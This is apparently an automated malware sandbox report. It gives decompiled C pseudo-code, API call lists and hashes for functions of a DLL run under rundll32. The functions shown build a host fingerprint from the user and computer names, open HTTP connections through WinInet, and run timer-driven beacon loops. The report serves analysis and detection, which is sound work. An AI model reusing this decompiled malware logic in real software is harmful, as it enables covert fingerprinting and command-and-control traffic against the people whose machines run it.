                      • Part of subcall function 0421252A: lstrlen.KERNEL32(?), ref: 04212542
                      • Part of subcall function 0421252A: lstrcpy.KERNEL32(00000000,04A99B50), ref: 04212556
                      • Part of subcall function 0421252A: lstrcat.KERNEL32(00000000,?), ref: 04212561
                    • lstrcpy.KERNEL32(00000000,?), ref: 0421319D
                    • lstrcpy.KERNEL32(00000000,00000000), ref: 042131A5
                    • lstrcat.KERNEL32(00000000,?), ref: 042131B3
                    • lstrcat.KERNEL32(00000000,00000000), ref: 042131B9
                      • Part of subcall function 04215406: lstrlen.KERNEL32(?,00000000,04A99D58,00000000,04213C77,04A99F7B,69B25F44,?,?,?,?,69B25F44,00000005,0421A00C,4D283A53,?), ref: 0421540D
                      • Part of subcall function 04215406: mbstowcs.NTDLL ref: 04215436
                      • Part of subcall function 04215406: memset.NTDLL ref: 04215448
                    • wcstombs.NTDLL ref: 0421324A
                      • Part of subcall function 04211E51: SysAllocString.OLEAUT32(?), ref: 04211E92
                      • Part of subcall function 04211E51: IUnknown_QueryInterface_Proxy.RPCRT4(00000008,332C4425,?), ref: 04211F14
                      • Part of subcall function 04211E51: StrStrIW.SHLWAPI(?,006E0069), ref: 04211F53
                      • Part of subcall function 042117AB: HeapFree.KERNEL32(00000000,00000000,04212976,00000000,?,?,00000000), ref: 042117B7
                    • HeapFree.KERNEL32(00000000,?,00000000), ref: 0421328B
                    • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 04213297
                    • RtlFreeHeap.NTDLL(00000000,00000000,?,04A995B0), ref: 042132A3
                    • HeapFree.KERNEL32(00000000,00000000), ref: 042132AF
                    • RtlFreeHeap.NTDLL(00000000,?), ref: 042132BB
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmp
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: Heap$Free$lstrlenwsprintf$lstrcat$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterInterface_LeaveProxyQueryStringUnknown_mbstowcsmemsetstrcpywcstombs
                    • String ID: Ut
                    • API String ID: 3111183435-8415677
                    • Opcode ID: 903a7518ade69836655df9c40f226242a3b3aeae4e7c6f0bbdf668457a68cdfb
                    • Instruction ID: 1ae7732107ecee1fd7c663042552daac7ffe44b0a9b2e7a4694eddfd87dcc1a0
                    • Opcode Fuzzy Hash: 903a7518ade69836655df9c40f226242a3b3aeae4e7c6f0bbdf668457a68cdfb
                    • Instruction Fuzzy Hash: 87912871A01209AFDB11DFA8EC48AAA7BF9EF68354F148055F80897270DB35ED51DBA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 102 4215458-421548a memset CreateWaitableTimerA 103 4215490-42154e9 _allmul SetWaitableTimer WaitForMultipleObjects 102->103 104 421560b-4215611 GetLastError 102->104 106 4215573-4215579 103->106 107 42154ef-42154f2 103->107 105 4215615-421561f 104->105 108 421557a-421557e 106->108 109 42154f4 call 4213399 107->109 110 42154fd 107->110 111 4215580-4215582 108->111 112 421558e-4215592 108->112 115 42154f9-42154fb 109->115 114 4215507 110->114 111->112 112->108 116 4215594-421559e CloseHandle 112->116 117 421550b-4215510 114->117 115->110 115->114 116->105 118 4215523-4215550 call 4213a12 117->118 119 4215512-4215519 117->119 123 42155a0-42155a5 118->123 124 4215552-421555d 118->124 119->118 120 421551b 119->120 120->118 126 42155c4-42155cc 123->126 127 42155a7-42155ad 123->127 124->117 125 421555f-421556f call 42117c0 124->125 125->106 128 42155d2-4215600 _allmul SetWaitableTimer WaitForMultipleObjects 126->128 127->106 130 42155af-42155c2 call 4215f6a 127->130 128->117 131 4215606 128->131 130->128 131->106
                    C-Code - Quality: 83%
                    			E04215458(void* __edx, intOrPtr _a4, intOrPtr _a8) {
                    				void _v48;
                    				long _v52;
                    				struct %anon52 _v60;
                    				char _v72;
                    				long _v76;
                    				void* _v80;
                    				union _LARGE_INTEGER _v84;
                    				struct %anon52 _v92;
                    				void* _v96;
                    				void* _v100;
                    				union _LARGE_INTEGER _v104;
                    				long _v108;
                    				struct %anon52 _v124;
                    				long _v128;
                    				struct %anon52 _t46;
                    				void* _t51;
                    				long _t53;
                    				void* _t54;
                    				struct %anon52 _t61;
                    				long _t65;
                    				struct %anon52 _t66;
                    				void* _t69;
                    				void* _t73;
                    				signed int _t74;
                    				void* _t76;
                    				void* _t78;
                    				void** _t82;
                    				signed int _t86;
                    				void* _t89;
                    
                    				_t76 = __edx;
                    				_v52 = 0;
                    				memset( &_v48, 0, 0x2c);
                    				_t89 = (_t86 & 0xfffffff8) - 0x54 + 0xc;
                    				_t46 = CreateWaitableTimerA(0, 1, 0);
                    				_v60 = _t46;
                    				if(_t46 == 0) {
                    					_v92.HighPart = GetLastError();
                    				} else {
                    					_push(0xffffffff);
                    					_push(0xff676980);
                    					_push(0);
                    					_push( *0x421a2e0);
                    					_v76 = 0;
                    					_v80 = 0;
                    					L0421818A();
                    					_v84.LowPart = _t46;
                    					_v80 = _t76;
                    					SetWaitableTimer(_v76,  &_v84, 0, 0, 0, 0);
                    					_t51 =  *0x421a30c; // 0x2ec
                    					_v76 = _t51;
                    					_t53 = WaitForMultipleObjects(2,  &_v80, 0, 0xffffffff);
                    					_v108 = _t53;
                    					if(_t53 == 0) {
                    						if(_a8 != 0) {
                    							L4:
                    							 *0x421a2ec = 5;
                    						} else {
                    							_t69 = E04213399(_t76); // executed
                    							if(_t69 != 0) {
                    								goto L4;
                    							}
                    						}
                    						_v104.LowPart = 0;
                    						L6:
                    						L6:
                    						if(_v104.LowPart == 1 && ( *0x421a300 & 0x00000001) == 0) {
                    							_v104.LowPart = 2;
                    						}
                    						_t74 = _v104.LowPart;
                    						_t58 = _t74 << 4;
                    						_t78 = _t89 + (_t74 << 4) + 0x38;
                    						_t75 = _t74 + 1;
                    						_v92.LowPart = _t74 + 1;
                    						_t61 = E04213A12( &_v96, _t75, _t78, _t75, _t89 + _t58 + 0x38, _t78,  &_v100); // executed
                    						_v124 = _t61;
                    						if(_t61 != 0) {
                    							goto L17;
                    						}
                    						_t66 = _v92;
                    						_t97 = _t66 - 3;
                    						_v104.LowPart = _t66;
                    						if(_t66 != 3) {
                    							goto L6;
                    						} else {
                    							_v124.HighPart = E042117C0(_t75, _t97,  &_v72, _a4, _a8);
                    						}
                    						goto L12;
                    						L17:
                    						__eflags = _t61 - 0x10d2;
                    						if(_t61 != 0x10d2) {
                    							_push(0xffffffff);
                    							_push(0xff676980);
                    							_push(0);
                    							_push( *0x421a2e4);
                    							goto L21;
                    						} else {
                    							__eflags =  *0x421a2e8; // 0x0
                    							if(__eflags == 0) {
                    								goto L12;
                    							} else {
                    								_t61 = E04215F6A();
                    								_push(0xffffffff);
                    								_push(0xdc3cba00);
                    								_push(0);
                    								_push( *0x421a2e8);
                    								L21:
                    								L0421818A();
                    								_v104.LowPart = _t61;
                    								_v100 = _t78;
                    								SetWaitableTimer(_v96,  &_v104, 0, 0, 0, 0); // executed
                    								_t65 = WaitForMultipleObjects(2,  &_v100, 0, 0xffffffff);
                    								__eflags = _t65;
                    								_v128 = _t65;
                    								if(_t65 == 0) {
                    									goto L6;
                    								} else {
                    									goto L12;
                    								}
                    							}
                    						}
                    						L25:
                    					}
                    					L12:
                    					_t82 =  &_v72;
                    					_t73 = 3;
                    					do {
                    						_t54 =  *_t82;
                    						if(_t54 != 0) {
                    							HeapFree( *0x421a2d8, 0, _t54);
                    						}
                    						_t82 =  &(_t82[4]);
                    						_t73 = _t73 - 1;
                    					} while (_t73 != 0);
                    					CloseHandle(_v80);
                    				}
                    				return _v92.HighPart;
                    				goto L25;
                    			}


                    APIs
                    • memset.NTDLL ref: 04215472
                    • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 0421547E
                    • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 042154A6
                    • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 042154C6
                    • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?,?,?,?,042166F1,?), ref: 042154E1
                    • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,042166F1,?,00000000), ref: 04215588
                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,042166F1,?,00000000,?,?), ref: 04215598
                    • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 042155D2
                    • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,?), ref: 042155EC
                    • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 042155F8
                      • Part of subcall function 04213399: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,04A993D8,00000000,?,74E5F710,00000000,74E5F730), ref: 042133E8
                      • Part of subcall function 04213399: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,04A99410,?,00000000,30314549,00000014,004F0053,04A993CC), ref: 04213485
                      • Part of subcall function 04213399: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,042154F9), ref: 04213497
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,042166F1,?,00000000,?,?), ref: 0421560B
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmp
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                    • String ID: Ut
                    • API String ID: 3521023985-8415677
                    • Opcode ID: dd54a40172a0cd71dac12e65b8fbb362b0c0b06ee6b889b0eeefb15a54133ab2
                    • Instruction ID: dc82949ca7eff64809fda7ccd2a8477be4e83a180a567fb707d3c392832be7ca
                    • Opcode Fuzzy Hash: dd54a40172a0cd71dac12e65b8fbb362b0c0b06ee6b889b0eeefb15a54133ab2
                    • Instruction Fuzzy Hash: 9E51DFB1618321BFD710DF19DC44D6BBBE9EF94364F104A1AF4A5821A0DB74E980CF92
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    C-Code - Quality: 92%
                    			E04217A34(void* __eax, void* __ecx, long __esi, char* _a4) {
                    				void _v8;
                    				long _v12;
                    				void _v16;
                    				void* _t34;
                    				void* _t38;
                    				void* _t40;
                    				char* _t56;
                    				long _t57;
                    				void* _t58;
                    				intOrPtr _t59;
                    				long _t65;
                    
                    				_t65 = __esi;
                    				_t58 = __ecx;
                    				_v16 = 0xea60;
                    				__imp__( *(__esi + 4));
                    				_v12 = __eax + __eax;
                    				_t56 = E042163FD(__eax + __eax + 1);
                    				if(_t56 != 0) {
                    					if(InternetCanonicalizeUrlA( *(__esi + 4), _t56,  &_v12, 0) == 0) {
                    						E042117AB(_t56);
                    					} else {
                    						E042117AB( *(__esi + 4));
                    						 *(__esi + 4) = _t56;
                    					}
                    				}
                    				_t34 = InternetOpenA(_a4, 0, 0, 0, 0x10000000); // executed
                    				 *(_t65 + 0x10) = _t34;
                    				if(_t34 == 0 || InternetSetStatusCallback(_t34, E042179C9) == 0xffffffff) {
                    					L15:
                    					return GetLastError();
                    				} else {
                    					ResetEvent( *(_t65 + 0x1c));
                    					_t38 = InternetConnectA( *(_t65 + 0x10),  *_t65, 0x50, 0, 0, 3, 0, _t65); // executed
                    					 *(_t65 + 0x14) = _t38;
                    					if(_t38 != 0 || GetLastError() == 0x3e5 && E04215867( *(_t65 + 0x1c), _t58, 0xea60) == 0) {
                    						_t59 =  *0x421a320; // 0x87d5a8
                    						_t15 = _t59 + 0x421b743; // 0x544547
                    						_v8 = 0x84404000;
                    						_t40 = HttpOpenRequestA( *(_t65 + 0x14), _t15,  *(_t65 + 4), 0, 0, 0, 0x84404000, _t65);
                    						 *(_t65 + 0x18) = _t40;
                    						if(_t40 == 0) {
                    							goto L15;
                    						}
                    						_t57 = 4;
                    						_v12 = _t57;
                    						if(InternetQueryOptionA(_t40, 0x1f,  &_v8,  &_v12) != 0) {
                    							_v8 = _v8 | 0x00000100;
                    							InternetSetOptionA( *(_t65 + 0x18), 0x1f,  &_v8, _t57);
                    						}
                    						if(InternetSetOptionA( *(_t65 + 0x18), 6,  &_v16, _t57) == 0 || InternetSetOptionA( *(_t65 + 0x18), 5,  &_v16, _t57) == 0) {
                    							goto L15;
                    						} else {
                    							return 0;
                    						}
                    					} else {
                    						goto L15;
                    					}
                    				}
                    			}


                    APIs
                    • lstrlen.KERNEL32(?,00000008,74E04D40), ref: 04217A46
                      • Part of subcall function 042163FD: RtlAllocateHeap.NTDLL(00000000,00000000,042128D5), ref: 04216409
                    • InternetCanonicalizeUrlA.WININET(?,00000000,00000000,00000000), ref: 04217A69
                    • InternetOpenA.WININET(00000000,00000000,00000000,00000000,10000000), ref: 04217A91
                    • InternetSetStatusCallback.WININET(00000000,042179C9), ref: 04217AA8
                    • ResetEvent.KERNEL32(?), ref: 04217ABA
                    • InternetConnectA.WININET(?,?,00000050,00000000,00000000,00000003,00000000,?), ref: 04217ACD
                    • GetLastError.KERNEL32 ref: 04217ADA
                    • HttpOpenRequestA.WININET(?,00544547,?,00000000,00000000,00000000,84404000,?), ref: 04217B20
                    • InternetQueryOptionA.WININET(00000000,0000001F,00000000,00000000), ref: 04217B3E
                    • InternetSetOptionA.WININET(?,0000001F,00000100,00000004), ref: 04217B5F
                    • InternetSetOptionA.WININET(?,00000006,0000EA60,00000004), ref: 04217B6B
                    • InternetSetOptionA.WININET(?,00000005,0000EA60,00000004), ref: 04217B7B
                    • GetLastError.KERNEL32 ref: 04217B85
                      • Part of subcall function 042117AB: HeapFree.KERNEL32(00000000,00000000,04212976,00000000,?,?,00000000), ref: 042117B7
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmp
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: Internet$Option$ErrorHeapLastOpen$AllocateCallbackCanonicalizeConnectEventFreeHttpQueryRequestResetStatuslstrlen
                    • String ID:
                    • API String ID: 2290446683-0
                    • Opcode ID: ef3397cd7cd50ddcae844b32e6afa7025d90eb22d40f67f1414f2d8093b99090
                    • Instruction ID: 3cc49194234c0dda092a2d3ce0f6d4a97fd636d44a5cec15378a7f8a2b958ce2
                    • Opcode Fuzzy Hash: ef3397cd7cd50ddcae844b32e6afa7025d90eb22d40f67f1414f2d8093b99090
                    • Instruction Fuzzy Hash: E4415C71710205BBD7219F69EC8CE6BBAFDEFE5710B100929F502D21A0EB74AA44CA60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 189 4217e75-4217eda 190 4217efb-4217f25 189->190 191 4217edc-4217ef6 RaiseException 189->191 193 4217f27 190->193 194 4217f2a-4217f36 190->194 192 42180ab-42180af 191->192 193->194 195 4217f49-4217f4b 194->195 196 4217f38-4217f43 194->196 197 4217f51-4217f58 195->197 198 4217ff3-4217ffd 195->198 196->195 208 421808e-4218095 196->208 202 4217f68-4217f75 LoadLibraryA 197->202 203 4217f5a-4217f66 197->203 200 4218009-421800b 198->200 201 4217fff-4218007 198->201 204 4218089-421808c 200->204 205 421800d-4218010 200->205 201->200 206 4217f77-4217f87 GetLastError 202->206 207 4217fb8-4217fc4 InterlockedExchange 202->207 203->202 203->207 204->208 213 4218012-4218015 205->213 214 421803e-421804c GetProcAddress 205->214 215 4217f97-4217fb3 RaiseException 206->215 216 4217f89-4217f95 206->216 217 4217fc6-4217fca 207->217 218 4217fec-4217fed FreeLibrary 207->218 211 4218097-42180a4 208->211 212 42180a9 208->212 211->212 212->192 213->214 219 4218017-4218022 213->219 214->204 220 421804e-421805e GetLastError 214->220 215->192 216->207 216->215 217->198 221 4217fcc-4217fd8 LocalAlloc 217->221 218->198 219->214 222 4218024-421802a 219->222 224 4218060-4218068 220->224 225 421806a-421806c 220->225 221->198 226 4217fda-4217fea 221->226 222->214 227 421802c-421802f 222->227 224->225 225->204 228 421806e-4218086 RaiseException 225->228 226->198 227->214 229 4218031-421803c 227->229 228->204 229->204 229->214
                    C-Code - Quality: 51%
                    			E04217E75(long _a4, long _a8) {
                    				signed int _v8;
                    				intOrPtr _v16;
                    				LONG* _v28;
                    				long _v40;
                    				long _v44;
                    				long _v48;
                    				CHAR* _v52;
                    				long _v56;
                    				CHAR* _v60;
                    				long _v64;
                    				signed int* _v68;
                    				char _v72;
                    				signed int _t76;
                    				signed int _t80;
                    				signed int _t81;
                    				intOrPtr* _t82;
                    				intOrPtr* _t83;
                    				intOrPtr* _t85;
                    				intOrPtr* _t90;
                    				intOrPtr* _t95;
                    				intOrPtr* _t98;
                    				struct HINSTANCE__* _t99;
                    				void* _t102;
                    				intOrPtr* _t104;
                    				void* _t115;
                    				long _t116;
                    				void _t125;
                    				void* _t131;
                    				signed short _t133;
                    				struct HINSTANCE__* _t138;
                    				signed int* _t139;
                    
                    				_t139 = _a4;
                    				_v28 = _t139[2] + 0x4210000;
                    				_t115 = _t139[3] + 0x4210000;
                    				_t131 = _t139[4] + 0x4210000;
                    				_v8 = _t139[7];
                    				_v60 = _t139[1] + 0x4210000;
                    				_v16 = _t139[5] + 0x4210000;
                    				_v64 = _a8;
                    				_v72 = 0x24;
                    				_v68 = _t139;
                    				_v56 = 0;
                    				asm("stosd");
                    				_v48 = 0;
                    				_v44 = 0;
                    				_v40 = 0;
                    				if(( *_t139 & 0x00000001) == 0) {
                    					_a8 =  &_v72;
                    					RaiseException(0xc06d0057, 0, 1,  &_a8);
                    					return 0;
                    				}
                    				_t138 =  *_v28;
                    				_t76 = _a8 - _t115 >> 2 << 2;
                    				_t133 =  *(_t131 + _t76);
                    				_a4 = _t76;
                    				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
                    				_v56 = _t80;
                    				_t81 = _t133 + 0x4210002;
                    				if(_t80 == 0) {
                    					_t81 = _t133 & 0x0000ffff;
                    				}
                    				_v52 = _t81;
                    				_t82 =  *0x421a1c0; // 0x0
                    				_t116 = 0;
                    				if(_t82 == 0) {
                    					L6:
                    					if(_t138 != 0) {
                    						L18:
                    						_t83 =  *0x421a1c0; // 0x0
                    						_v48 = _t138;
                    						if(_t83 != 0) {
                    							_t116 =  *_t83(2,  &_v72);
                    						}
                    						if(_t116 != 0) {
                    							L32:
                    							 *_a8 = _t116;
                    							L33:
                    							_t85 =  *0x421a1c0; // 0x0
                    							if(_t85 != 0) {
                    								_v40 = _v40 & 0x00000000;
                    								_v48 = _t138;
                    								_v44 = _t116;
                    								 *_t85(5,  &_v72);
                    							}
                    							return _t116;
                    						} else {
                    							if(_t139[5] == _t116 || _t139[7] == _t116) {
                    								L27:
                    								_t116 = GetProcAddress(_t138, _v52);
                    								if(_t116 == 0) {
                    									_v40 = GetLastError();
                    									_t90 =  *0x421a1bc; // 0x0
                    									if(_t90 != 0) {
                    										_t116 =  *_t90(4,  &_v72);
                    									}
                    									if(_t116 == 0) {
                    										_a4 =  &_v72;
                    										RaiseException(0xc06d007f, _t116, 1,  &_a4);
                    										_t116 = _v44;
                    									}
                    								}
                    								goto L32;
                    							} else {
                    								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
                    								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
                    									_t116 =  *(_a4 + _v16);
                    									if(_t116 != 0) {
                    										goto L32;
                    									}
                    								}
                    								goto L27;
                    							}
                    						}
                    					}
                    					_t98 =  *0x421a1c0; // 0x0
                    					if(_t98 == 0) {
                    						L9:
                    						_t99 = LoadLibraryA(_v60); // executed
                    						_t138 = _t99;
                    						if(_t138 != 0) {
                    							L13:
                    							if(InterlockedExchange(_v28, _t138) == _t138) {
                    								FreeLibrary(_t138);
                    							} else {
                    								if(_t139[6] != 0) {
                    									_t102 = LocalAlloc(0x40, 8);
                    									if(_t102 != 0) {
                    										 *(_t102 + 4) = _t139;
                    										_t125 =  *0x421a1b8; // 0x0
                    										 *_t102 = _t125;
                    										 *0x421a1b8 = _t102;
                    									}
                    								}
                    							}
                    							goto L18;
                    						}
                    						_v40 = GetLastError();
                    						_t104 =  *0x421a1bc; // 0x0
                    						if(_t104 == 0) {
                    							L12:
                    							_a8 =  &_v72;
                    							RaiseException(0xc06d007e, 0, 1,  &_a8);
                    							return _v44;
                    						}
                    						_t138 =  *_t104(3,  &_v72);
                    						if(_t138 != 0) {
                    							goto L13;
                    						}
                    						goto L12;
                    					}
                    					_t138 =  *_t98(1,  &_v72);
                    					if(_t138 != 0) {
                    						goto L13;
                    					}
                    					goto L9;
                    				}
                    				_t116 =  *_t82(0,  &_v72);
                    				if(_t116 != 0) {
                    					goto L33;
                    				}
                    				goto L6;
                    			}

                    APIs
                    • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 04217EEE
                    • LoadLibraryA.KERNEL32(?), ref: 04217F6B
                    • GetLastError.KERNEL32 ref: 04217F77
                    • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 04217FAA
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmp
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: ExceptionRaise$ErrorLastLibraryLoad
                    • String ID: $
                    • API String ID: 948315288-3993045852
                    • Opcode ID: 52e48b737bbc01d82cbccede95101270c8b4072c9930cbf710aaf4405e56b293
                    • Instruction ID: d9e0fcf9e0fc8e1dc99ea867ff9179e4529d5f74088de456c160b0b61c9e666a
                    • Opcode Fuzzy Hash: 52e48b737bbc01d82cbccede95101270c8b4072c9930cbf710aaf4405e56b293
                    • Instruction Fuzzy Hash: E9813F71B1120A9FDB20DF98D894AAEB7F5FFA8350F148029E905D7350EBB4E945CB60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 231 42121bc-42121d0 232 42121d2-42121d7 231->232 233 42121da-42121ec call 4215894 231->233 232->233 236 4212240-421224d 233->236 237 42121ee-42121fe GetUserNameW 233->237 238 421224f-4212266 GetComputerNameW 236->238 237->238 239 4212200-4212210 RtlAllocateHeap 237->239 240 42122a4-42122c6 238->240 241 4212268-4212279 RtlAllocateHeap 238->241 239->238 242 4212212-421221f GetUserNameW 239->242 241->240 243 421227b-4212284 GetComputerNameW 241->243 244 4212221-421222d call 42152a9 242->244 245 421222f-421223e 242->245 247 4212295-4212298 243->247 248 4212286-4212292 call 42152a9 243->248 244->245 245->238 247->240 248->247
                    C-Code - Quality: 96%
                    			E042121BC(char __eax, signed int* __esi) {
                    				long _v8;
                    				char _v12;
                    				signed int _v16;
                    				signed int _v20;
                    				signed int _v28;
                    				long _t34;
                    				signed int _t39;
                    				long _t50;
                    				char _t59;
                    				intOrPtr _t61;
                    				void* _t62;
                    				void* _t63;
                    				signed int* _t64;
                    				char _t65;
                    				intOrPtr* _t67;
                    				void* _t68;
                    				signed int* _t69;
                    
                    				_t69 = __esi;
                    				_t65 = __eax;
                    				_v8 = 0;
                    				_v12 = __eax;
                    				if(__eax == 0) {
                    					_t59 =  *0x421a310; // 0xd448b889
                    					_v12 = _t59;
                    				}
                    				_t64 = _t69;
                    				E04215894( &_v12, _t64);
                    				if(_t65 != 0) {
                    					 *_t69 =  *_t69 ^  *0x421a31c ^ 0x46d76429;
                    				} else {
                    					GetUserNameW(0,  &_v8); // executed
                    					_t50 = _v8;
                    					if(_t50 != 0) {
                    						_t62 = RtlAllocateHeap( *0x421a2d8, 0, _t50 + _t50);
                    						if(_t62 != 0) {
                    							if(GetUserNameW(_t62,  &_v8) != 0) {
                    								_t63 = _t62;
                    								 *_t69 =  *_t69 ^ E042152A9(_v8 + _v8, _t63);
                    							}
                    							HeapFree( *0x421a2d8, 0, _t62);
                    						}
                    					}
                    				}
                    				_t61 = __imp__;
                    				_v8 = _v8 & 0x00000000;
                    				GetComputerNameW(0,  &_v8);
                    				_t34 = _v8;
                    				if(_t34 != 0) {
                    					_t68 = RtlAllocateHeap( *0x421a2d8, 0, _t34 + _t34);
                    					if(_t68 != 0) {
                    						if(GetComputerNameW(_t68,  &_v8) != 0) {
                    							_t63 = _t68;
                    							_t69[3] = _t69[3] ^ E042152A9(_v8 + _v8, _t63);
                    						}
                    						HeapFree( *0x421a2d8, 0, _t68);
                    					}
                    				}
                    				asm("cpuid");
                    				_t67 =  &_v28;
                    				 *_t67 = 1;
                    				 *((intOrPtr*)(_t67 + 4)) = _t61;
                    				 *(_t67 + 8) = _t63;
                    				 *(_t67 + 0xc) = _t64;
                    				_t39 = _v16 ^ _v20 ^ _v28;
                    				_t69[1] = _t69[1] ^ _t39;
                    				return _t39;
                    			}

                    APIs
                    • GetUserNameW.ADVAPI32(00000000,?), ref: 042121F3
                    • RtlAllocateHeap.NTDLL(00000000,?), ref: 0421220A
                    • GetUserNameW.ADVAPI32(00000000,?), ref: 04212217
                    • HeapFree.KERNEL32(00000000,00000000), ref: 04212238
                    • GetComputerNameW.KERNEL32(00000000,00000000), ref: 0421225F
                    • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 04212273
                    • GetComputerNameW.KERNEL32(00000000,00000000), ref: 04212280
                    • HeapFree.KERNEL32(00000000,00000000), ref: 0421229E
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmp
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: HeapName$AllocateComputerFreeUser
                    • String ID: Ut
                    • API String ID: 3239747167-8415677
                    • Opcode ID: 06791abc597c3cc1b797da358ef3488f3f5000aeb79147ca4e97dcd7c80beb74
                    • Instruction ID: ff27dc516299d6208687db497fd9d24e6529ab435e0ba4631818ff7d9f478c5e
                    • Opcode Fuzzy Hash: 06791abc597c3cc1b797da358ef3488f3f5000aeb79147ca4e97dcd7c80beb74
                    • Instruction Fuzzy Hash: AD310D71B10205EFDB11DFA9EC84A6EB7F9EB64310F104469E405E7220DF74EE459B20
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    C-Code - Quality: 74%
                    			E0421414A(intOrPtr __edx, void** _a4, void** _a8) {
                    				intOrPtr _v8;
                    				struct _FILETIME* _v12;
                    				short _v56;
                    				struct _FILETIME* _t12;
                    				intOrPtr _t13;
                    				void* _t17;
                    				void* _t21;
                    				intOrPtr _t27;
                    				long _t28;
                    				void* _t30;
                    
                    				_t27 = __edx;
                    				_t12 =  &_v12;
                    				GetSystemTimeAsFileTime(_t12);
                    				_push(0x192);
                    				_push(0x54d38000);
                    				_push(_v8);
                    				_push(_v12);
                    				L04218184();
                    				_push(_t12);
                    				_v12 = _t12;
                    				_t13 =  *0x421a320; // 0x87d5a8
                    				_t5 = _t13 + 0x421b87e; // 0x4a98e26
                    				_t6 = _t13 + 0x421b59c; // 0x530025
                    				_push(0x16);
                    				_push( &_v56);
                    				_v8 = _t27;
                    				L04217DEA();
                    				_t17 = CreateFileMappingW(0xffffffff, 0x421a34c, 4, 0, 0x1000,  &_v56); // executed
                    				_t30 = _t17;
                    				if(_t30 == 0) {
                    					_t28 = GetLastError();
                    				} else {
                    					if(GetLastError() == 0xb7) {
                    						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
                    						if(_t21 == 0) {
                    							_t28 = GetLastError();
                    							if(_t28 != 0) {
                    								goto L6;
                    							}
                    						} else {
                    							 *_a4 = _t30;
                    							 *_a8 = _t21;
                    							_t28 = 0;
                    						}
                    					} else {
                    						_t28 = 2;
                    						L6:
                    						CloseHandle(_t30);
                    					}
                    				}
                    				return _t28;
                    			}
